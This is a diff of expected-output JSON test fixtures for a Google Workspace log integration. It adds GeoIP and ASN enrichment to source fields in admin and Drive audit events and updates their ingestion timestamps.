@@ -4971,6 +5823,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4980,7 +5844,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005203500Z", + "ingested": "2021-12-14T14:44:54.652006461Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"UPGRADE_USER_TO_GPLUS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPGRADE_USER_TO_GPLUS", @@ -5041,6 +5905,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -5050,7 +5926,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005208800Z", + "ingested": "2021-12-14T14:44:54.652006823Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"0\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"}]}}", "provider": "admin", "action": "USERS_BULK_UPLOAD", 
@@ -5106,6 +5982,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -5115,7 +6003,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005214200Z", + "ingested": "2021-12-14T14:44:54.652007183Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USERS_BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "USERS_BULK_UPLOAD_NOTIFICATION_SENT", diff --git a/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log-expected.json b/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log-expected.json index 3640b63aa91..15e22811322 100644 --- a/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log-expected.json +++ b/packages/google_workspace/data_stream/drive/_dev/test/pipeline/test-drive.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -62,8 +50,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398293900Z", + "ingested": "2021-12-14T14:45:08.344986991Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"add_to_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "add_to_folder", @@ -79,21 +88,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -141,8 +141,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398298100Z", + "ingested": "2021-12-14T14:45:08.344989928Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_canceled\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "approval_canceled", @@ -160,21 +181,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -222,8 +234,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398301600Z", + "ingested": "2021-12-14T14:45:08.344990414Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_comment_added\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "approval_comment_added", @@ -241,21 +274,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -303,8 +327,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398307700Z", + "ingested": "2021-12-14T14:45:08.344990846Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_requested\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "approval_requested", @@ -322,21 +367,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -384,8 +420,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398312700Z", + "ingested": "2021-12-14T14:45:08.344991275Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_reviewer_responded\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "approval_reviewer_responded", @@ -403,21 +460,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -465,8 +513,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398317800Z", + "ingested": "2021-12-14T14:45:08.344991672Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"create\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "create", @@ -482,21 +551,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -544,8 +604,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398323600Z", + "ingested": "2021-12-14T14:45:08.344992068Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"delete\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "delete", @@ -561,21 +642,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -623,8 +695,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398329300Z", + "ingested": "2021-12-14T14:45:08.344997761Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"download\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "download", @@ -640,21 +733,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -702,8 +786,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398335Z", + "ingested": "2021-12-14T14:45:08.344998169Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"edit\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "edit", @@ -719,21 +824,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -781,8 +877,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398340800Z", + "ingested": "2021-12-14T14:45:08.344998561Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"add_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "add_lock", @@ -798,21 +915,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -864,8 +972,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398346600Z", + "ingested": "2021-12-14T14:45:08.344998962Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"move\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}", "provider": "drive", "action": "move", @@ -881,21 +1010,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -943,8 +1063,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398352600Z", + "ingested": "2021-12-14T14:45:08.344999546Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"preview\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "preview", @@ -960,21 +1101,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -1022,8 +1154,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398358400Z", + "ingested": "2021-12-14T14:45:08.344999932Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"print\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "print", @@ -1039,21 +1192,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
@@ -1103,8 +1247,29 @@ "organization": { "id": "1" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "user": { + "name": "foo", + "id": "1", + "email": "foo@bar.com", + "domain": "bar.com" + }, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:08.398364Z", + "ingested": "2021-12-14T14:45:08.345000330Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"remove_from_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}", "provider": "drive", "action": "remove_from_folder", @@ -1120,21 +1285,12 @@ "name": "foo", "domain": "bar.com", "id": "1" - } - }, - { - "source": { - "user": { - "name": "foo", - "id": "1", - "email": "foo@bar.com", - "domain": "bar.com" - }, - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-10-02T15:00:00.000Z", "file": { "owner": "owner", 
